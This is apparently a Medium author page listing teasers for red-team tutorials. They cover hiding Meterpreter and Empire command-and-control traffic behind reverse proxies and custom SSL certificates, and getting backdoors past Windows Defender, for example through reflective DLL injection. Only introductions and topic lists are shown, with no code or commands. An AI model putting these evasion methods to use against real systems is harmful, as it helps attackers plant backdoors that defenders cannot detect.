Meterpreter & Nginx Reverse Proxy

Photo by Markus Winkler via Unsplash.com

INTRODUCTION

If you have been playing around with Meterpreter in highly monitored environments, you probably know that the plug-and-play options won’t work for you. You will need to hide your C2 (command-and-control) traffic amongst the regular web traffic on the network and therefore have to use the advanced options like HandlerSSLCert, OverrideRequestHost and EnableStageEncoding next to using system ports like 80/HTTP or 443/HTTPS.

Setting up a listener on a system port (0–1023) requires administrative privileges but when you start Meterpreter with sudo or as the root user, Meterpreter will tell you that PayloadUUIDTracking will not work (amongst other things). There are…


Bypassing Windows Defender — Meterpreter edition

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. MSFvenom payload creation
  2. Extra XOR layer
  3. Create DLL and Powershell Download Script
  4. Get a shell!

Bypassing Windows Defender

Last month, I wrote two articles about the proper use of SSL with Powershell Empire and SSL with Meterpreter. That alone (and some other magic) let us bypass most of the Antivirus products. However, since a few weeks, Windows Defender seems to have gotten a lot smarter and is be able to detect these techniques. This tutorial will guide you in creating a working Meterpreter backdoor using a technique called ‘Reflective DLL Injection’ without being detected by Windows Defender. …


Bypassing Windows Defender — Empire edition

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Empire setup
  2. Magic to avoid detection
  3. Go go go!

Bypassing Windows Defender

Last month, I wrote two articles about the proper use of SSL with Powershell Empire and SSL with Meterpreter. That alone (and some other magic) let us bypass most of the Antivirus products. However, since a few weeks, Windows Defender seems to have gotten a lot smarter and is be able to detect these techniques. This tutorial will guide you in creating a working Empire backdoor without being detected by Windows Defender. For the same guide written for Meterpreter, check out Red Team Tutorials №4.

1. Empire setup

Below, you’ll see me use SSL…


Encrypting Empire traffic

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Empire Magic

GO THE EXTRA MILE

Stop being lazy. Stop using the default options that come with your favourite hacking tools. To avoid detection, you need play smart. Because believe it or not, Hunters (or: Blue Teamers) are becoming smarter every day.

In this tutorial, I will not only focus on the (proper) use of SSL but I will also show you some of the options that need changing to avoid detection. The options I set are in no way conclusive, but merely a way to show you that the defaults are easily fingerprintable. So, go the extra mile!

I…


Encrypting Meterpreter traffic

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Meterpreter Magic

STOP USING DEFAULT SSL CERTIFICATES

By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable data that enables Hunters to easily detect your backdoor.

Obviously, with SSL Termination (or SSL offloading), Hunters would be able to read and interpret the data stream, but this technique is computationally intensive work and therefore — most of the time — requires a separate device. …

Crypt0jan

Founder // Hacker @ Chapter8.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store